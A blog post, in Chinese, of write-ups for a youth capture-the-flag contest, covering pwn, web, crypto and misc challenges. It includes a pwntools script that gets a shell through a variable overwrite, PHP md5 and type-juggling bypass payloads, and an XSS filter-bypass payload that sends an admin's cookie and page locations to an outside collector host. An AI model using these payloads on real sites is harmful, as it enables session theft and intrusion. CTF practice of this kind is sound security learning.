Press "Enter" to skip to content

第四届“强网杯”-青少年专项赛部分writeup

220 次浏览

pwn加减乘除


ida 反编译,发现输入 name 的地方存在变量覆盖
继续分析
(a) passcode = 3
(b) passcode += 4
(c) passcode *= 7
(d) passcode /= 5
passcode 初始值为 0,通过 a,b,c,d 进行运算,但不能大于 66,最后结果等于 66 就可以往下执行
,下面有个 if ( dword_40A0 )语句,需要 dword_40A0 为1,即可获取 shell,前面发现了 name 存
在变量覆盖,可以覆盖到 dword_40A0
思路:
name 输入 100 个 1
算数结果:bcbdcbbbbbb
脚本:
from pwn import *
p=process(‘pwn1’)
p.sendlineafter(‘start: ‘,’1’*100)
s=’bcbdcbbbbbb’
for i in s:
p.sendlineafter(‘> ‘,i)
p.interactive()

webeasy_php

代码审计
绕过一
if( ($_GET[‘a1’] == $_GET[‘a2’]) || (md5($_GET[‘a1’]) != md5($_GET[‘a2’])) ){
die(“No”);
}
用数组绕过
a1[]=1&a2[]=2
绕过二
if( ($_GET[‘b1’] === $_GET[‘b2’]) || (md5($_GET[‘b1’]) !== md5($_GET[‘b2’])) ){
die(“NoNo”);
}
全等的话就不能用数组绕过,直接用 [安洵杯 2019 easy_web ]的 payload
网址:https://www.cnblogs.com/buchuo/p/12611244.html
b1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b
%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b
%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b2=
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc
%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b
%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
绕过三
if( strlen($_GET[‘time’])>4 || $_GET[‘time’]<time() || is_array($_GET[‘time’])){
die(“NoNoNo”);
}
可用用 0e 绕过
time=9e12
最终的 payload
http://eci-2ze57ktwcm7rytwozj99.cloudeci1.ichunqiu.com/?a1[]=1&a2[]=2&b1=%4d%c9%68%ff
%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d
%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f
%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b2=%4d
%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc
%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b
%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe
%a2&time=9e12

web-xss

本题参考 CISCN2019-华东北赛区 Web-XSS
参考链接:https://blog.csdn.net/weixin_44677409/article/details/100741998
在输入姓名查询那里存在 xss
但过滤了 script 可用使用双写绕过

<scriscriptpt>alert(“xss”)</scrscriptipt>

反馈功能,那里管理员会对链接进行查看
Admin 功能,猜测需要管理员 cookie

解题思路:
通过反馈功能,利用 xss 获取管理员的 cookie
再进行访问 Admin 即可
这里的 payload 直接用 CISCN2019-华东北赛区 Web-XSS 的 payload
xss=”(function(){window.location.href=’http://ip/index.php?
do=api&id=odd1Xf&location=’+escape((function(){try{return
document.location.href}catch(e){return ”}})())
+’&toplocation=’+escape((function(){try{return
top.location.href}catch(e){return ”}})())
+’&cookie=’+escape((function(){try{return document.cookie}catch(e)
{return ”}})())+’&opener=’+escape((function(){try{return
(window.opener && window.opener.location.href)?
window.opener.location.href:”}catch(e){return ”}})());})();”
output = “”
for c in xss:
output += “&#” + str(ord(c))
print(“eval(“” + output + “”)”)

在反馈功能里发送 payload

func2?
csrf_token=IjViMjk5ODA4Nzk3YzI5MzE0ODQwOTliM2Y2Y2ExYmY4MWU1MTk2N2Qi.X1
OAqw.wYz3QvtCOZOpKPGSjNLBuUcP1DU&name=%3Csvg%3E%3Cscrscriptipt%3Eeval
%26%2340%26%2334%26%2340%26%23102%26%23117%26%23110%26%2399%26%23116%
26%23105%26%23111%26%23110%26%2340%26%2341%26%23123%26%23119%26%23105
%26%23110%26%23100%26%23111%26%23119%26%2346%26%23108%26%23111%26%2399
%26%2397%26%23116%26%23105%26%23111%26%23110%26%2346%26%23104%26%23114
%26%23101%26%23102%26%2361%26%2339%26%23104%26%23116%26%23116%26%2311
2%26%2358%26%2347%26%2347%26%23111%26%23107%26%2397%26%23109%26%23105
%26%23104%26%23109%26%2346%26%23101%26%2349%26%2346%26%23108%26%23117
%26%23121%26%23111%26%23117%26%23120%26%23105%26%2397%26%2346%26%2311
0%26%23101%26%23116%26%2358%26%2350%26%2350%26%2349%26%2356%26%2349%2
6%2347%26%2363%26%23100%26%23111%26%2361%26%2397%26%23112%26%23105%26
%2338%26%23105%26%23100%26%2361%26%2397%26%23114%26%2372%26%2365%26%2
371%26%23120%26%2338%26%23108%26%23111%26%2399%26%2397%26%23116%26%23
105%26%23111%26%23110%26%2361%26%2339%26%2343%26%23101%26%23115%26%23
99%26%2397%26%23112%26%23101%26%2340%26%2340%26%23102%26%23117%26%231
10%26%2399%26%23116%26%23105%26%23111%26%23110%26%2340%26%2341%26%231
23%26%23116%26%23114%26%23121%26%23123%26%23114%26%23101%26%23116%26%
23117%26%23114%26%23110%26%2332%26%23100%26%23111%26%2399%26%23117%26%
23109%26%23101%26%23110%26%23116%26%2346%26%23108%26%23111%26%2399%26
%2397%26%23116%26%23105%26%23111%26%23110%26%2346%26%23104%26%23114%26
%23101%26%23102%26%23125%26%2399%26%2397%26%23116%26%2399%26%23104%26
%2340%26%23101%26%2341%26%23123%26%23114%26%23101%26%23116%26%23117%2
6%23114%26%23110%26%2332%26%2339%26%2339%26%23125%26%23125%26%2341%26
%2340%26%2341%26%2341%26%2343%26%2339%26%2338%26%23116%26%23111%26%23
112%26%23108%26%23111%26%2399%26%2397%26%23116%26%23105%26%23111%26%23
110%26%2361%26%2339%26%2343%26%23101%26%23115%26%2399%26%2397%26%2311
2%26%23101%26%2340%26%2340%26%23102%26%23117%26%23110%26%2399%26%2311
6%26%23105%26%23111%26%23110%26%2340%26%2341%26%23123%26%23116%26%2311
4%26%23121%26%23123%26%23114%26%23101%26%23116%26%23117%26%23114%26%2
3110%26%2332%26%23116%26%23111%26%23112%26%2346%26%23108%26%23111%26%2
399%26%2397%26%23116%26%23105%26%23111%26%23110%26%2346%26%23104%26%2
3114%26%23101%26%23102%26%23125%26%2399%26%2397%26%23116%26%2399%26%2
3104%26%2340%26%23101%26%2341%26%23123%26%23114%26%23101%26%23116%26%
23117%26%23114%26%23110%26%2332%26%2339%26%2339%26%23125%26%23125%26%
2341%26%2340%26%2341%26%2341%26%2343%26%2339%26%2338%26%2399%26%23111
%26%23111%26%23107%26%23105%26%23101%26%2361%26%2339%26%2343%26%23101
%26%23115%26%2399%26%2397%26%23112%26%23101%26%2340%26%2340%26%23102%
26%23117%26%23110%26%2399%26%23116%26%23105%26%23111%26%23110%26%2340%
26%2341%26%23123%26%23116%26%23114%26%23121%26%23123%26%23114%26%23101
%26%23116%26%23117%26%23114%26%23110%26%2332%26%23100%26%23111%26%2399
%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%2399%26%23111
%26%23111%26%23107%26%23105%26%23101%26%23125%26%2399%26%2397%26%2311
6%26%2399%26%23104%26%2340%26%23101%26%2341%26%23123%26%23114%26%2310
1%26%23116%26%23117%26%23114%26%23110%26%2332%26%2339%26%2339%26%2312
5%26%23125%26%2341%26%2340%26%2341%26%2341%26%2343%26%2339%26%2338%2
6%23111%26%23112%26%23101%26%23110%26%23101%26%23114%26%2361%26%2339%2
6%2343%26%23101%26%23115%26%2399%26%2397%26%23112%26%23101%26%2340%26
%2340%26%23102%26%23117%26%23110%26%2399%26%23116%26%23105%26%23111%26
%23110%26%2340%26%2341%26%23123%26%23116%26%23114%26%23121%26%23123%2
6%23114%26%23101%26%23116%26%23117%26%23114%26%23110%26%2332%26%2340%26%23119%26%23105%26%23110%26%23100%26%23111%26%23119%26%2346%26%23111%
26%23112%26%23101%26%23110%26%23101%26%23114%26%2332%26%2338%26%2338%
26%2332%26%23119%26%23105%26%23110%26%23100%26%23111%26%23119%26%2346%
26%23111%26%23112%26%23101%26%23110%26%23101%26%23114%26%2346%26%23108
%26%23111%26%2399%26%2397%26%23116%26%23105%26%23111%26%23110%26%2346
%26%23104%26%23114%26%23101%26%23102%26%2341%26%2363%26%23119%26%2310
5%26%23110%26%23100%26%23111%26%23119%26%2346%26%23111%26%23112%26%231
01%26%23110%26%23101%26%23114%26%2346%26%23108%26%23111%26%2399%26%23
97%26%23116%26%23105%26%23111%26%23110%26%2346%26%23104%26%23114%26%23
101%26%23102%26%2358%26%2339%26%2339%26%23125%26%2399%26%2397%26%2311
6%26%2399%26%23104%26%2340%26%23101%26%2341%26%23123%26%23114%26%2310
1%26%23116%26%23117%26%23114%26%23110%26%2332%26%2339%26%2339%26%2312
5%26%23125%26%2341%26%2340%26%2341%26%2341%26%2359%26%23125%26%2341%
26%2340%26%2341%26%2359%26%2334%26%2341%3C%2Fscrscriptipt%3E&submit=Get+It
%21

成功获取 cookie

访问 admin 传入 cookie

web-easy_http

GET 传参 fruit=apple
POST 传参 vegetable=potato
修改请求头 User-Agent: Http_1s_W0nd3rful

crypto-简单算法

逆向一下算法
脚本:
s=[49, 60, 58, 53, 50, 107, 117, 63, 57, 107, 63, 109, 66, 137, 65, 119, 118, 128, 142, 118, 117, 118,
123, 147, 77, 126, 130, 124, 152, 80, 127, 134, 83, 87, 134, 87, 147, 148, 142, 95, 93, 85]
flag=”
k=0
for i in s:
k=k+1
flag+=chr(i-k^86)
print flag

crypto-easy_Crypto

Crypto3_1.txt 内容゚ ω ゚ノ=/m ́)ノ~ ┻━┻ //* ́ ∇*/[‘_’];o=…这种是 aaencode 加密
解密网址:https://www.qtool.net/decode

得到数字5
crypto3_2.png 为猪圈加密
解密网址:http://ctf.ssleye.com/pigpen.html

根据题目描述可以得知栅栏加密了,刚刚 aadecode 解密得到栅栏数为5
解密网址:https://cryptii.com/pipes/rail-fence-cipher

crypto-base64

题目给出了明文和密文,还有个 flag 的密文
直接 base64 解码失败,猜测可能是 base64 变换了密码表
根据密文和明文来推测一下
原数据:
sadhlkj122i3upoi213456aABSADHKJHLKJSADSADJLKHUOIPQWUEYUGHJ12345678901223
3165410123123456789123709864hjklhfjldsnfzkpidjskljkamxcvmbcxamvbnm
加密后的数据:
h2QDfRrKfCPsxFDticMpfYTrxtV1yFQMVEyMWPAwXDAxX0IYVZWYVZWvYPnTaZ9uZQQ
caZaeaZiTXCPsxtV1yCh4zYLrxCTtxtP2yYVrxOPsxtPsxtV1yCh4zYPsxthqzYl2yRAJf2rHeFIme
SyoeGIKhREDfGyKgRIKdb14d3endFy4db12dF5nn
自己 base64 加密的密文
c2FkaGxrajEyMmkzdXBvaTIxMzQ1NmFBQlNBREhLSkhMS0pTQURTQURKTEtIVU9JUFFX
VUVZVUdISjEyMzQ1Njc4OTAxMjIzMzE2NTQxMDEyMzEyMzQ1Njc4OTEyMzcwOTg2NGh
qa2xoZmpsZHNuZnprcGlkanNrbGprYW14Y3ZtYmN4YW12Ym5t
可以发现 base64 加密后的 c 被替换成了 h,数字不变,F 替换成了 Q,以此类推
根据上面的方法,将 flag.txt 里的密文进行还原
ZmxhZ3t (N)未知 YXNlNjRfMXNfUzBfRjRudGE1dGlj (k)未知 Q==
但是没有找到 k 和 N,需要猜测一下

通过 flag 格式可以推断出来 k → f
还有一个暴力猜测得到 N → C
所以最终还原的密文为:
ZmxhZ3tCYXNlNjRfMXNfUzBfRjRudGE1dGljfQ==

crypto-moss

打开文件得到一串摩斯密码,拿去解密得到 F L A G %u7b M O S S I S V E R Y F 4 N T Y %u7d ,
发现这并不是 flag 格式,然后把字母全部替换成小写,根据 flag 格式把%u7b 和%u7d 换成{ ,}

flag{mossisveryf4nty}

mis-easy_pcap

打开 easy_pcap 包,根据题意网络流量就是用户通过网络传输的数据,过滤 http contains php

ZmxhZyU3QjElMjdtX0g0Y0tfVjFzaTdfWTB1Ul9Db01wdXRlcl9hd2VTb21lJTdE.php
base64 解密得
python 脚本:
import base64
a=’ZmxhZyU3QjElMjdtX0g0Y0tfVjFzaTdfWTB1Ul9Db01wdXRlcl9hd2VTb21lJTdE’
b=base64.b64decode(a)
print(b)
得到 flag%7B1%27m_H4cK_V1si7_Y0uR_CoMputer_aweSome%7D,再 URL 解码

flag{1’m_H4cK_V1si7_Y0uR_CoMputer_aweSome}

misc-git 谜底

解压文件看到里面有个.git 文件夹,查看文件夹里的文件发现 config 文件里有一个链接:
https://github.com/maxcruz/stegano_midi;
用浏览器打开下载工具,工具里的 README.md 文件可以查看使用方法;
接下来吧我们的 enjoy.mid 文件复制到工具里,使用方法:python stegano-midi.py –reveal —
file=enjoy.mid 解出 flag
注:如果运行显示缺少库,请根据报错提示安装;

flag 值:
flag{misc_stegano_is_everywhere}

misc-Luo_Tianyi

根据题目描述首先想到用 binwalk 查看有没有隐藏文件,无果;
然后继续审题,发现题目名字不同寻常,猜测是 steghide 隐写;
用 steghide 工具: steghide extract -sf timg.jpg -p luotianyi 得到 flag.txt,打开即可以看到 flag

flag 值:
flag{8dfe88db-0def-4873-9f17-f9c46bd571b6}

misc-一切皆可视

根据题目描述,百度查了一下可视化编程,科普到了 span 语言,在把附件 baby_code.xml 打
开并审查发现有一个 https://snap.berkeley.edu 链接,正好是 snap 语言并打开链接:
如图点击运行:

我们先把 xml 文件导入到里面,然后点击 Variables,把右边的 test 托到 say no!!! for 5 secs,把
no!!!这个条件覆盖成 test,我们看到列表的那串数字,通过 flag 格式输入发现最下面 5 位刚好是 flag{ ,得知是从下往上的规律:

通过字符集(qwertyuiopasdfghjklzxcvbnm1234567890@!_{})输入推断得到 flag

flag{w3l1C0m3_@nd_G00d_lUck!}

发表评论

电子邮件地址不会被公开。 必填项已用*标注